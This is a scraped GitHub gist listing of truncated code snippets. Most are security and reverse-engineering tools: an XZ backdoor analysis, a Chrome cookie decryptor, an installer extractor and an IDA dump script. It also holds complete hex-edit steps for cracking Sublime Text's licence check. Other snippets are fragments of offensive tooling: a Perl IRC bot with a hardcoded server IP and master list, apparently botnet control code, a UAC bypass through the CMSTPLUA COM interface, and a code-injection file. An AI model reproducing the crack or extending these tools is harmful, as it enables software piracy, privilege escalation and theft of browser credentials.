@smx-smx
smx-smx / XZ Backdoor Analysis
Last active February 24, 2026 09:30
[WIP] XZ Backdoor Analysis and symbol mapping
XZ Backdoor symbol deobfuscation. Updated as I make progress
#include <Windows.h>
#include "aclapi.h"
#include <chrono>
#include <thread>
DWORD ProtectProcess(void)
{
HANDLE hProcess = GetCurrentProcess();
PACL pEmptyDacl;
DWORD dwErr;
@zackmark29
zackmark29 / decryptchromecookies.py
Created May 16, 2021 14:19
Decrypt Chrome Cookies File (Python 3) - Windows
# Based on:
# https://gist.github.com/DakuTree/98c8362fb424351b803e
# https://gist.github.com/jordan-wright/5770442
# https://gist.github.com/DakuTree/428e5b737306937628f2944fbfdc4ffc
# https://stackoverflow.com/questions/60416350/chrome-80-how-to-decode-cookies
# https://stackoverflow.com/questions/43987779/python-module-crypto-cipher-aes-has-no-attribute-mode-ccm-even-though-pycry
import os
import json
import base64
@KasparNagu
KasparNagu / advancedInstallerExtractor.py
Last active February 12, 2026 11:54
Script to extract Advanced Installer Exes
#!/usr/bin/env python
import sys
import struct
import os
#inspired by https://aluigi.altervista.org/bms/advanced_installer.bms
#with some additional reverse engineering, quite heuristic (footer search, xor guessing etc)
#licence: public domain
@JerryLokjianming
JerryLokjianming / Crack Sublime Text Windows and Linux.md
Last active March 12, 2026 11:10
Crack Sublime Text 3.2.2 Build 3211 and Sublime Text 4 Alpha 4098 with Hex

How to Crack Sublime Text 3.2.2 Build 3211 with Hex Editor (Windows | Without License) ↓

  1. Download & Install Sublime Text 3.2.2 Build 3211
  2. Visit https://hexed.it/
  3. Open file select sublime_text.exe
  4. Offset 0x8545: Original 84 -> 85
  5. Offset 0x08FF19: Original 75 -> EB
  6. Offset 0x1932C7: Original 75 -> 74 (remove UNREGISTERED in title bar, so no need to use a license)
@sv0
sv0 / as.pl
Created January 24, 2019 14:41 — forked from nl5887/as.pl
Perl IRC bot
#!/usr/bin/perl
my @mast3rs = ("z","w","x");
my @hostauth = ("localhost");
my @admchan=("#ssh");
my @server = ("91.191.19.112");
$servidor= $server[rand scalar @server] unless $servidor;
@herrcore
herrcore / ida_memdump.py
Created November 13, 2017 03:38
Dump a blob of memory into a file - IDA Pro script
import idautils
import idaapi
import idc

def memdump(ea, size, file):
    # Read `size` bytes starting at address `ea` and write them to `file`
    data = idc.GetManyBytes(ea, size)
    with open(file, "wb") as fp:
        fp.write(data)
    print("Memdump Success!")
@simoncos
simoncos / golang_on_rpi.md
Last active March 7, 2025 06:21 — forked from konradko/golang_on_rpi.md
Install Golang 1.9 on Raspberry Pi

Install Golang 1.9:

wget https://storage.googleapis.com/golang/go1.9.linux-armv6l.tar.gz
sudo tar -C /usr/local -xzf go1.9.linux-armv6l.tar.gz
export PATH=$PATH:/usr/local/go/bin # put into ~/.profile

If an old Golang is already installed with apt-get:

@hfiref0x
hfiref0x / akagi_41.c
Created August 16, 2017 03:31
UAC bypass using CMSTPLUA COM interface
typedef interface ICMLuaUtil ICMLuaUtil;
typedef struct ICMLuaUtilVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in ICMLuaUtil * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
@Nordwald
Nordwald / debug.c
Last active July 11, 2020 13:11
Code Injection
/*
* Gets Thread token for current thread.
* Returns NULL on failure.
*/
HANDLE GetCurrentThreadToken()
{
HANDLE hToken;
if (!OpenThreadToken(